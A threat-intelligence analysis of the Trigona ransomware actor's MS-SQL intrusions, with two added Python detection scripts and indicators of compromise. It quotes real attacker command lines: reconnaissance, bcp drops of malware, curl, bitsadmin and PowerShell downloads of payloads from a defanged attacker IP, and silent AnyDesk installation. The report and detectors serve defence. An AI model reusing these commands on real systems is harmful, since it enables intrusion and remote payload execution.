Analysis of Trigona Threat Actor’s Latest Attack Cases

AhnLab SEcurity intelligence Center (ASEC) has previously covered the Trigona threat actor’s attacks on MS-SQL servers in the post “Trigona Ransomware Threat Actor Uses Mimic Ransomware.”[1] Both Trigona and Mimic ransomware were used in those cases. The email address in the Mimic ransom note has not been seen in other attack cases, but the email address used by the Trigona threat actor has been in use since early 2023, so the attacks are presumed to be the work of the same Trigona threat actor.

ASEC has confirmed that the same threat actor is still active and is attacking targets in a similar manner to the past cases, but with new types of malware and tools. This post presents the latest attack cases and their IoCs.

1. Attacks on MS-SQL Servers

As in the post “Trigona Ransomware Attacking MS-SQL Servers”[2], the Trigona threat actors are attacking MS-SQL servers that are exposed to the public or whose accounts are configured with simple credentials, making them vulnerable to brute-force and dictionary attacks. After successfully logging in, the threat actors use CLR Shell to install additional payloads, and this pattern has continued in the recent cases. The following are the commands that the threat actors executed after gaining control of the MS-SQL servers to collect information about the infected systems.

> hostname
> whoami
> systeminfo
> tasklist
> wmic useraccount where (LocalAccount=True) get name
> powershell -Command "net user ladmin

2. Malware Installation Method

One of the key characteristics of the Trigona threat actor is that they create files using the Bulk Copy Program (BCP). The bcp.exe utility is a command-line tool for importing and exporting large volumes of data to and from MS-SQL servers. It is typically used to save large volumes of data stored in a SQL server table to a local file, or to load data files stored locally into a table in an SQL server.

The threat actor stored the malware in a database table and then used BCP to write it out as a local file. That is, the following commands export the malware from the table “uGnzBdZbsi”, where it is stored, to a local path, with “FODsOZKgAU.txt” as the format file that describes the data layout. Both “uGnzBdZbsi” and “FODsOZKgAU.txt” are keywords that were also used in the 2024 attack case.

> bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\spd.exe" -T -f "C:\ProgramData\FODsOZKgAU.txt"
> bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\AD.exe" -T -f "C:\ProgramData\FODsOZKgAU.txt"
> bcp "select binaryTable from uGnzBdZbsi" queryout "C:\users\[User Name]\music\L.bat" -T -f "C:\users\[User Name]\music\FODsOZKgAU.txt"
> bcp "select binaryTable from uGnzBdZbsi" queryout "C:\users\[User Name]\music\pci2.exe" -T -f "C:\users\[User Name]\music\FODsOZKgAU.txt

Figure 1. Creating malware using BCP

Of course, BCP is not the only tool exploited by the threat actors. In the attack cases, tools such as Curl, Bitsadmin, and PowerShell were also used to download malware.

> curl hxxps://cia[.]tf/60b30e194972f937b859d0075be69e2a.exe -o C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\glock.exe
> bitsadmin /transfer indirme  /download /priority normal hxxp://195.66.214[.]79/pci.exe c:\users\[username]\Videos\pci.exe
> powershell Invoke-WebRequest -Uri "hxxp://195.66.214[.]79/L.bat" -OutFile "c:\users\[username]\music\L.bat
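The chain in sections 1 and 2 (reconnaissance launched from the SQL server process, BCP writing binaries to disk, and LOLBin downloads) is what a defender would hunt for in process-creation telemetry. The following Python is an added example and is not code from ASEC or from the article. It assumes events in the shape of Sysmon Event ID 1 (parent image, image, command line); the sample events are constructed to mirror the commands above, the file paths, the victim user name and the rule names are placeholders of my own, and the IP and file names are the ones the article reports.

```python
"""Detection for the MS-SQL post-exploitation chain described above.

Added example, not ASEC's code. It evaluates process-creation events in the
shape of Sysmon Event ID 1 (parent image, image, command line) and flags:
  1. host reconnaissance spawned by sqlservr.exe (CLR shell / xp_cmdshell style),
  2. bcp.exe "queryout" writing an executable or script to disk,
  3. LOLBin downloaders (curl, bitsadmin, PowerShell) fetching from a URL.
The events at the bottom are constructed samples; paths and the victim user
name are placeholders.
"""
import ntpath
import re
from dataclasses import dataclass

# Recon commands seen in the article, executed right after the SQL login.
RECON_RE = re.compile(
    r"\b(hostname|whoami|systeminfo|tasklist|wmic\s+useraccount|net\s+user)\b", re.I)
# bcp ... queryout "<path>": capture the output path with or without quotes.
QUERYOUT_RE = re.compile(r'queryout\s+"?([^"\s]+)', re.I)
# Accepts live (http) and defanged (hxxp) URLs so the sample data can stay defanged.
URL_RE = re.compile(r"""h(?:tt|xx)ps?://[^\s"']+""", re.I)

DOWNLOADERS = {"curl.exe", "bitsadmin.exe", "powershell.exe", "pwsh.exe", "certutil.exe"}
DROP_EXTS = {".exe", ".dll", ".bat", ".cmd", ".ps1", ".vbs", ".msi"}


@dataclass
class Finding:
    rule: str
    detail: str


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path).lower()


def inspect_event(ev: dict) -> list[Finding]:
    """Apply the three rules to one event; an event may match more than one rule."""
    findings: list[Finding] = []
    parent, image, cmd = _base(ev["parent"]), _base(ev["image"]), ev["cmdline"]

    # Rule 1: sqlservr.exe has no business launching host reconnaissance.
    # If an intermediate cmd.exe sits between them, walk the process ancestry first.
    if parent == "sqlservr.exe" and (m := RECON_RE.search(cmd)):
        findings.append(Finding("recon_from_sqlservr", m.group(1).lower()))

    # Rule 2: bcp queryout is meant for data exports; an executable target is a file drop.
    if image == "bcp.exe" and (m := QUERYOUT_RE.search(cmd)):
        target = m.group(1)
        if ntpath.splitext(target)[1].lower() in DROP_EXTS:
            findings.append(Finding("bcp_writes_executable", target))

    # Rule 3: a download LOLBin fetching from a URL on a database server.
    if image in DOWNLOADERS and (m := URL_RE.search(cmd)):
        findings.append(Finding("lolbin_download", m.group(0)))
    return findings


def scan(events: list[dict]) -> list[Finding]:
    """Run every event through inspect_event and flatten the results."""
    return [f for ev in events for f in inspect_event(ev)]


# Constructed sample telemetry (placeholder install paths and user name).
SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
BCP = r"C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\bcp.exe"
SAMPLE_EVENTS = [
    {"parent": SQLSERVR, "image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami"},
    {"parent": SQLSERVR, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic useraccount where (LocalAccount=True) get name"},
    {"parent": SQLSERVR, "image": BCP,
     "cmdline": r'bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\spd.exe" -T -f "C:\ProgramData\FODsOZKgAU.txt"'},
    {"parent": SQLSERVR, "image": BCP,  # legitimate data export: must not fire
     "cmdline": r'bcp "select * from dbo.Sales" queryout "C:\exports\sales.dat" -T -c'},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer indirme /download /priority normal hxxp://195.66.214[.]79/pci.exe c:\users\victim\Videos\pci.exe"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell Invoke-WebRequest -Uri "hxxp://195.66.214[.]79/L.bat" -OutFile "c:\users\victim\music\L.bat"'},
    {"parent": r"C:\Windows\System32\services.exe", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule:24} {f.detail}")
```

Run stand-alone it prints five findings (two recon commands, the spd.exe drop and the two downloads) and stays silent on the legitimate `sales.dat` export and the svchost event. Rule 2 is the one worth tuning per environment: BCP exports to data files are normal on a database server, so the extension list rather than the presence of bcp.exe is what carries the signal.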

3. Analyzing Malware

3.1. Remote Control

As in previous cases, the threat actor abused AnyDesk to control the infected system. They installed AnyDesk in the %ALLUSERSPROFILE% path with the following commands.

> %SystemDrive%/programdata/AD.exe --install C:\programdata --silent
> %SystemDrive%/programdata/Anydesk-e7eba7df --get-id

In addition, for RDP access, the threat actor executed a batch file like the one below, which adds a user named “Remote99” or “Ladmin” that can connect over RDP. This batch malware also modifies registry keys related to AnyDesk or UseLogonCredential.

Figure 2. Batch file responsible for adding users

Among the newly identified malware is a downloader built with Bat2Exe. Its main function is to create and execute a batch file like the one below. This batch script also creates an account named “erp2,” but its additional feature is installing an MSI file from an external source. As of now, the file can no longer be downloaded, but it is presumed to be the installer for an RMM tool called Teramind. It appears that the threat actor used Teramind alongside RDP and AnyDesk to control the infected system.

Figure 3. Teramind downloader script
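The batch files in this section leave a recognisable trail in Windows event logs: a new local account, that account being granted RDP access, and a change to the UseLogonCredential value. The following Python is an added example, not code from ASEC or from the article. It correlates those steps from constructed sample events; the event IDs (Security 4720 and 4732, Sysmon 13) and the WDigest registry path are real, while the host names, timestamps, ten-minute window and rule names are my own assumptions.

```python
r"""Correlating the persistence steps described above (added example, not ASEC's code).

The batch files create an account such as "Remote99", "Ladmin" or "erp2", give it
RDP access, and touch the UseLogonCredential registry value. In Windows telemetry
that shows up as:
  - Security Event 4720  (user account created),
  - Security Event 4732  (member added to a local group, e.g. Remote Desktop Users),
  - Sysmon Event 13      (registry value set); UseLogonCredential lives under
    HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest and a value
    of 1 makes WDigest keep clear-text credentials in memory.
The events at the bottom are constructed samples; hosts and timestamps are placeholders.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)                 # account created -> granted RDP within this window
RDP_GROUPS = {"remote desktop users", "administrators"}
KNOWN_NAMES = {"remote99", "ladmin", "erp2"}   # account names reported in the article
DWORD_RE = re.compile(r"0x([0-9a-f]+)", re.I)  # Sysmon renders DWORDs as "DWORD (0x00000001)"


@dataclass
class Finding:
    rule: str
    detail: str


def correlate(events: list[dict]) -> list[Finding]:
    """Single pass over time-ordered events, tracking account creation per (host, user)."""
    created: dict[tuple[str, str], datetime] = {}
    findings: list[Finding] = []
    for ev in sorted(events, key=lambda e: e["ts"]):   # ISO timestamps sort as strings
        ts = datetime.fromisoformat(ev["ts"])
        host = ev["host"]
        if ev["id"] == 4720:
            created[(host, ev["user"].lower())] = ts
        elif ev["id"] == 4732 and ev["group"].lower() in RDP_GROUPS:
            user = ev["user"].lower()
            t0 = created.get((host, user))
            # Only a freshly created account that is immediately granted RDP fires;
            # an account created hours earlier is treated as routine administration.
            if t0 is not None and ts - t0 <= WINDOW:
                tag = " (name seen in Trigona cases)" if user in KNOWN_NAMES else ""
                findings.append(Finding("new_account_granted_rdp",
                                        f"{host}: {ev['user']} -> {ev['group']}{tag}"))
        elif ev["id"] == 13 and ev["key"].lower().endswith(r"\wdigest\uselogoncredential"):
            m = DWORD_RE.search(ev["value"])
            if m and int(m.group(1), 16) == 1:
                findings.append(Finding("wdigest_cleartext_enabled", f"{host}: {ev['key']}"))
    return findings


# Constructed sample events.
WDIGEST = r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential"
SAMPLE_EVENTS = [
    {"ts": "2024-05-01T10:00:05", "host": "SQL01", "id": 4720, "user": "Remote99"},
    {"ts": "2024-05-01T10:00:07", "host": "SQL01", "id": 4732, "user": "Remote99",
     "group": "Remote Desktop Users"},
    {"ts": "2024-05-01T10:00:09", "host": "SQL01", "id": 13, "key": WDIGEST,
     "value": "DWORD (0x00000001)"},
    # SQL02: an admin created a service account in the morning and granted RDP hours later.
    {"ts": "2024-05-01T08:12:00", "host": "SQL02", "id": 4720, "user": "svc_backup"},
    {"ts": "2024-05-01T11:40:00", "host": "SQL02", "id": 4732, "user": "svc_backup",
     "group": "Remote Desktop Users"},
    # SQL02: a hardening script explicitly sets UseLogonCredential to 0.
    {"ts": "2024-05-01T11:41:00", "host": "SQL02", "id": 13, "key": WDIGEST,
     "value": "DWORD (0x00000000)"},
]

if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f"{f.rule:26} {f.detail}")
```

On the sample data only SQL01 produces findings: the Remote99 account granted RDP two seconds after creation, and UseLogonCredential set to 1. The svc_backup case and the value-0 write on SQL02 are deliberately benign so the window and value checks are exercised.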

3.2. Scanner (RDP, MS-SQL)

The most notable difference from previous cases is the use of multiple scanner malware. The scanner is written in Rust and, when executed, sends information about the infected system, including its IP address and the location information obtained through “ip-api.com”, to the C&C server. It then performs scans according to the commands it receives. The scan targets are RDP and MS-SQL services.

Figure 4. Strings of the Rust Scanner malware

Additionally, the threat actor appears to run tests before installing such scanning and brute-forcing malware. Among the tools they installed are SpeedTest, an internet speed measurement tool provided by Ookla, and StressTester, which is presumed to have been developed by the threat actor themselves. StressTester is written in Go and provides test features for SQL injection requests as well as GET and POST requests.

Figure 5. StressTester with SQL Injection feature

3.3. Others

Other tools used include Defender Control and privilege escalation tools that are publicly available on GitHub [3]. Various further malware and tools appeared in the attacks, such as malware that deletes files in specific paths and malware that replaces executable files in specific paths with malicious code. The file-deleting malware exists in two forms, one developed in Rust and one as a batch script. It deletes the directories in the paths where the malware is installed, such as “C:\Users\Default\Drivers” and “C:\Drivers,” and also deletes the “.exe” executable files in the “C:\ProgramData” and “C:\Users\Public\Music” directories.

Figure 6. Batch script responsible for deleting directories and files

4. Conclusion

The main attacks against MS-SQL servers are brute-force and dictionary attacks on systems whose account credentials are managed poorly. Administrators must use complex passwords that are difficult to guess and change them regularly to protect their database servers from such attacks.

Users must also update V3 to the latest version so that malware infections can be prevented. Security products such as a firewall must also be used to control external threat actors’ access to the database server. If these measures are not taken, the server may be repeatedly infected by threat actors and malware.

MD5

2e4d250ecae8635fa3698eba5772a3b9
3c21181c35d955f9e557417998c38942
44bca3e7da4c28be4f55af0370091931
4af4c15092110057cb0a97df626c4ef4
4d627c63fdd8442eaf7d9be7e50d1e46

URL

http[:]//195[.]66[.]214[.]79/AD[.]exe
http[:]//195[.]66[.]214[.]79/AD[.]msi
http[:]//195[.]66[.]214[.]79/L[.]bat
http[:]//195[.]66[.]214[.]79/Monitor[.]exe
http[:]//195[.]66[.]214[.]79/drivers[.]txt

IP

179[.]43[.]159[.]186
198[.]55[.]98[.]133